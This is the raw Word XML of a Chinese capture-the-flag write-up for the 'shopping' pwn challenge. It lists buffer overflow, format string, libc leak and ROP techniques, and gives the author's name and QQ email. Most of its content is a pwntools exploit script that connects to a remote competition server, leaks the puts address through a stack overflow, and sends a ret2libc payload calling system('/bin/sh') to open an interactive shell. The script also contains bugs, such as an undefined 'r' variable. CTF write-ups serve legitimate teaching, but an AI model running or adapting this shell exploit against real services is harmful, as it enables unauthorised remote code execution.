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5DA6EC66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>SCC2024 WriteUp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C9F607" w14:textId="77777777" w:rsidR="00026849" w:rsidRDefault="00026849" w:rsidP="00026849">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Whooops+李卓航+925798691@qq.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744DFA74" w14:textId="107F5DF6" w:rsidR="00AF064E" w:rsidRPr="00E97F35" w:rsidRDefault="00A53948" w:rsidP="00E97F35">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica" w:hint="eastAsia"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="222222"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Pwn</w:t>
      </w:r>
      <w:r w:rsidR="00026849">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E97F35">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>shopping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A76CDE5" w14:textId="44B72087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786AFA7D" w14:textId="0B099D7F" w:rsidR="00E97F35" w:rsidRPr="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r w:rsidRPr="00E97F35">
        <w:t>缓冲区溢出</w:t>
      </w:r>
      <w:r w:rsidRPr="00E97F35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B188812" w14:textId="33610C37" w:rsidR="00E97F35" w:rsidRPr="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r w:rsidRPr="00E97F35">
        <w:t>格式化字符串漏洞利用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3728DB5A" w14:textId="44428DA1" w:rsidR="00E97F35" w:rsidRPr="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r w:rsidRPr="00E97F35">
        <w:t>动态链接库（libc）泄露和利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00E97F35">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F068631" w14:textId="166BB0C5" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E97F35">
        <w:t>ROP链构造</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79878D88" w14:textId="7E940165" w:rsidR="00AF064E" w:rsidRPr="006D7CD7" w:rsidRDefault="00AF064E" w:rsidP="00E97F35">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="006D7CD7">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidRPr="006D7CD7">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E01619" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t># 导入pwn库，用于快速创建Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DBCB232" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>from pwn import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0CFE56" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35"/>
    <w:p w14:paraId="0C85D860" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t># 导入LibcSearcher3库，用于搜索libc函数偏移</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CA9805" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>from LibcSearcher3 import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4836B3AF" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35"/>
    <w:p w14:paraId="75981F6E" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t># 连接远程服务器</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FABD83" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>p = remote('182.92.237.102', 10014)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194542DA" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35"/>
    <w:p w14:paraId="11226D21" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t># 设置pwn环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C14CD9" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>context(arch='i386', os='linux', log_level='debug')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AE1412" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>context.terminal = ['tmux', 'splitw', '-h']</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B44DE77" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35"/>
    <w:p w14:paraId="0C17529A" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t># 定义函数地址和全局偏移地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C8897A" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>puts_plt = 0x08048490</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294EFB9E" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>puts_got = 0x0804A018</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56179E42" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>great = 0x08048624</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631F3D37" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35"/>
    <w:p w14:paraId="407C4EC2" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t># 发送第一个请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE631E7" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>p.sendlineafter(b'Do you enjoy ISCC', b'yes')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49156B6B" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>p.recvuntil()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C6D57D" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>p.sendlineafter(b'Then I will show you something gpeat.', b'OK')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F912A6" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>p.recvuntil(b'Here it is!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="394D35E8" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35"/>
    <w:p w14:paraId="6219E9AF" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t># 构造第一个payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1726C7B4" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>payload = flat(b'a' * 0x70, puts_plt, great, puts_got)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C7F1CC" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>p.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2293FBCC" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35"/>
    <w:p w14:paraId="222F8F09" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t># 接收返回结果，并解析出gets函数的真实地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158F2284" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>p.recvuntil(b'a' * 0x70)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2BD80D" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>p.recvline()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400C4A1B" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>gets_real_addr = u32(r.recv(4))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3283D06A" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>log.success('gets_real_addr==&gt; ' + hex(gets_real_addr))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DF4DD9" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35"/>
    <w:p w14:paraId="62BA416A" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t># 计算libc基地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6C7992" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>libc_base = gets_real_addr - 0x5e8a0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42808565" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>log.success('libe_base==&gt; ' + (hex(libc_base)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="578A45BD" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35"/>
    <w:p w14:paraId="6EA23987" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t># 计算system函数地址和/bin/sh字符串地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6085D006" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>system = libc_base + 0x3a950</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088A6A3F" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>log.success('system==&gt; ' + (hex(system)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411AB439" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>bin_sh = libc_base + 0x15912b</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3880D788" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35"/>
    <w:p w14:paraId="41D95AAB" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t># 发送第二个payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7818EE" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>p.recvuntil(b'Here it is!')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C612EE2" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>payload = flat(b'a' * 0x70, system, 0, bin_sh)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37509ECB" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>p.sendline(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8B3FB" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35"/>
    <w:p w14:paraId="3C4D5CAE" w14:textId="77777777" w:rsidR="00E97F35" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t># 交互模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25A01A4B" w14:textId="7EE95766" w:rsidR="00EA3779" w:rsidRPr="00EA3779" w:rsidRDefault="00E97F35" w:rsidP="00E97F35">
      <w:r>
        <w:t>p.interactive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555A4" w14:textId="77777777" w:rsidR="003A1051" w:rsidRDefault="003A1051" w:rsidP="00944EC9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="207687E2" w14:textId="77777777" w:rsidR="003A1051" w:rsidRDefault="003A1051" w:rsidP="00944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44CDC" w14:textId="77777777" w:rsidR="003A1051" w:rsidRDefault="003A1051" w:rsidP="00944EC9">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="72686552" w14:textId="77777777" w:rsidR="003A1051" w:rsidRDefault="003A1051" w:rsidP="00944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90BD7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D76C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2E6F0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="37ECE754"/>
    <w:lvl w:ilvl="0" w:tplc="2A544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5359777">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1670399090">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="197397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26849"/>
    <w:rsid w:val="001043FF"/>
    <w:rsid w:val="00216943"/>
    <w:rsid w:val="003A1051"/>
    <w:rsid w:val="003D0756"/>
    <w:rsid w:val="00555ADA"/>
    <w:rsid w:val="0061096D"/>
    <w:rsid w:val="006D7CD7"/>
    <w:rsid w:val="00944EC9"/>
    <w:rsid w:val="009D2552"/>
    <w:rsid w:val="00A53948"/>
    <w:rsid w:val="00AF064E"/>
    <w:rsid w:val="00C346CE"/>
    <w:rsid w:val="00C850A0"/>
    <w:rsid w:val="00DD290E"/>
    <w:rsid w:val="00E31F60"/>
    <w:rsid w:val="00E50877"/>
    <w:rsid w:val="00E97F35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944EC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4E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4EC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4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2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-11T03:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-05-07T01:19:00Z</dcterms:modified>
</cp:coreProperties>
</file>